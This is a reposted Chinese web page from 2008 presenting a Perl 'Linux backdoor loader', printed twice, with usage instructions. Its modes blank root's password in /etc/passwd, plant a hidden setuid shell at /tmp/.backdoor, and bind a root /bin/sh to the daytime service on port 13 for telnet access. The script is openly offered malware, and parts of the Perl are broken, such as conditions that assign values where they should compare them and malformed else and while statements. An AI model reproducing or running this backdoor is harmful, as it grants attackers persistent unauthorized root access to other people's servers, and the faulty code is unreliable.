| 導購 | 订阅 | 在线投稿
分享
 
 
 

用perl寫的linux後門加載程序

來源:互聯網  2008-05-19 06:26:00  評論
窄屏简体版  手機版  移動版  字體: ||

print "++++++++++++++++++++++++++++++++++++linux後門工具+++++++++++++++++++++++++++++++++++\n";

print "使用說明,有三中模式rushroot,fakebackdoor,和rushport,rushroot是加一個賬號到passwd中,用戶名是root,密碼爲空n fakebackdoor是綁定一個shell到/tmp/.backdoor下,運行後直接取得root shell,rushport是綁定端口在daytime服務中\n,有兩個版本,一個是針對redhatlinux7.0一下的--rushport1,一個是針對redhatlinux7.0以上的--rushport2.\n一般服務器都不開這個服務,程序自動激活daytime服務,telnet到13端口直接取得rootshell 這種方法隱蔽性相對前兩中最好\n,記住要重啓daytime服務才能生效\n eg: rush rushroot,程序還有很多可以優化的地方,如果有什麽好的改進請email to gaomeigaocuo\@hotmail.com\n by 流氓我一生\n";

$parameter = @;ARGV[0];

chomp $parameter;

if ($parameter = "rushroot")

{

&rushroot;

}

elsif ($parameter = "fakebackdoor")

{

&fakebackdoor;

}

elsif($parameter = "rushport")

{

&rushport1;

}

else ($parameter = "rushport2")

{

&rushport2;

}

sub rushroot

{

open (PWD,"/etc/passwd") || die "cannt find the shadow file!\n";

while()

{

chop;

$passwd.="$_\n";

last;

}

chomp $passwd;

if($passwd eq "root:x:0:0:root:/root:/bin/bash")

{

$passwd =~s/x//g;

print "rushroot success!now you can get a rootshell with null passwd";

}

else

{

print "faild....something wrong....:(((";

}

while()

{

chomp;

$passwd1.="$_\n";

}

close PWD;

open (PWD,"/etc/passwd")||die "why?";

print PWD $passwd;

print PWD $passwd1;

}

sub fakebackdoor

{

@cpsh = ("cp", "/bin/sh /tmp/.backdoor");

@chmod= ("chmod","u+s /tmp/.backdoor");

system(@cpsh);

system(@chmod);

print "success! now you can use ./tmp/.backdoor to get a root shell\n";

}

sub rushport1

{

open (RH6,"/etc/inetd.d/inetd.conf") || die "cannt find the shadow file!\n"; #這裏根據版本不同可自己修改路徑

while()

{

chomp;

$passwd.="$_\n";

chomp $passwd;

if ($passwd eq "daytime stream tcp nowait root internal")

{

$passwd =~s/root internal/bin\/sh -i/g;

}

last;

close RH6;

open (RH6,"/etc/inetd.d/inetd.conf")||die "faild...:("; # #這裏根據版本不同可自己修改路徑

print RH6 $passwd;

print "success! now you can telnet romote host at port 13 after reboot the daytime session\n";

}

}

sub rushport2

{

open (DAYTIME,"/etc/xinetd.d/daytime") || die "can't open file!";

$daytime = "service daytime\n {\n disable = no\n server =/bin/sh\n server_agrs = --norc\n id = daytime-stream\n socket_type = stream\n protocol = tcp\n user = root\n wait = no\n }\n";

print DAYTIME $daytime;

print "success! now you can telnet romote host at port 13 after reboot the daytime session\n";

}

  print "++++++++++++++++++++++++++++++++++++linux後門工具+++++++++++++++++++++++++++++++++++\n";   print "使用說明,有三中模式rushroot,fakebackdoor,和rushport,rushroot是加一個賬號到passwd中,用戶名是root,密碼爲空n fakebackdoor是綁定一個shell到/tmp/.backdoor下,運行後直接取得root shell,rushport是綁定端口在daytime服務中\n,有兩個版本,一個是針對redhatlinux7.0一下的--rushport1,一個是針對redhatlinux7.0以上的--rushport2.\n一般服務器都不開這個服務,程序自動激活daytime服務,telnet到13端口直接取得rootshell 這種方法隱蔽性相對前兩中最好\n,記住要重啓daytime服務才能生效\n eg: rush rushroot,程序還有很多可以優化的地方,如果有什麽好的改進請email to gaomeigaocuo\@hotmail.com\n by 流氓我一生\n";   $parameter = @;ARGV[0];   chomp $parameter;   if ($parameter = "rushroot")   {   &rushroot;   }   elsif ($parameter = "fakebackdoor")   {   &fakebackdoor;   }   elsif($parameter = "rushport")   {   &rushport1;   }   else ($parameter = "rushport2")   {   &rushport2;   }   sub rushroot   {   open (PWD,"/etc/passwd") || die "cannt find the shadow file!\n";   while()   {   chop;   $passwd.="$_\n";   last;   }   chomp $passwd;   if($passwd eq "root:x:0:0:root:/root:/bin/bash")   {   $passwd =~s/x//g;   print "rushroot success!now you can get a rootshell with null passwd";   }   else   {   print "faild....something wrong....:(((";   }   while()   {   chomp;   $passwd1.="$_\n";   }   close PWD;   open (PWD,"/etc/passwd")||die "why?";   print PWD $passwd;   print PWD $passwd1;   }   sub fakebackdoor   {   @cpsh = ("cp", "/bin/sh /tmp/.backdoor");   @chmod= ("chmod","u+s /tmp/.backdoor");   system(@cpsh);   system(@chmod);   print "success! now you can use ./tmp/.backdoor to get a root shell\n";   }   sub rushport1   {   open (RH6,"/etc/inetd.d/inetd.conf") || die "cannt find the shadow file!\n"; #這裏根據版本不同可自己修改路徑   while()   {   chomp;   $passwd.="$_\n";   chomp $passwd;   if ($passwd eq "daytime stream tcp nowait root internal")   {   $passwd =~s/root internal/bin\/sh -i/g;   }   last;   close RH6;   open (RH6,"/etc/inetd.d/inetd.conf")||die "faild...:("; # #這裏根據版本不同可自己修改路徑   print RH6 $passwd;   print "success! now you can telnet romote host at port 13 after reboot the daytime session\n";   }   }   sub rushport2   {   open (DAYTIME,"/etc/xinetd.d/daytime") || die "can't open file!";   $daytime = "service daytime\n {\n disable = no\n server =/bin/sh\n server_agrs = --norc\n id = daytime-stream\n socket_type = stream\n protocol = tcp\n user = root\n wait = no\n }\n";   print DAYTIME $daytime;   print "success! now you can telnet romote host at port 13 after reboot the daytime session\n";   }   
󰈣󰈤
 
 
 
>>返回首頁<<
 
 
 
 
 熱帖排行
 
 
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有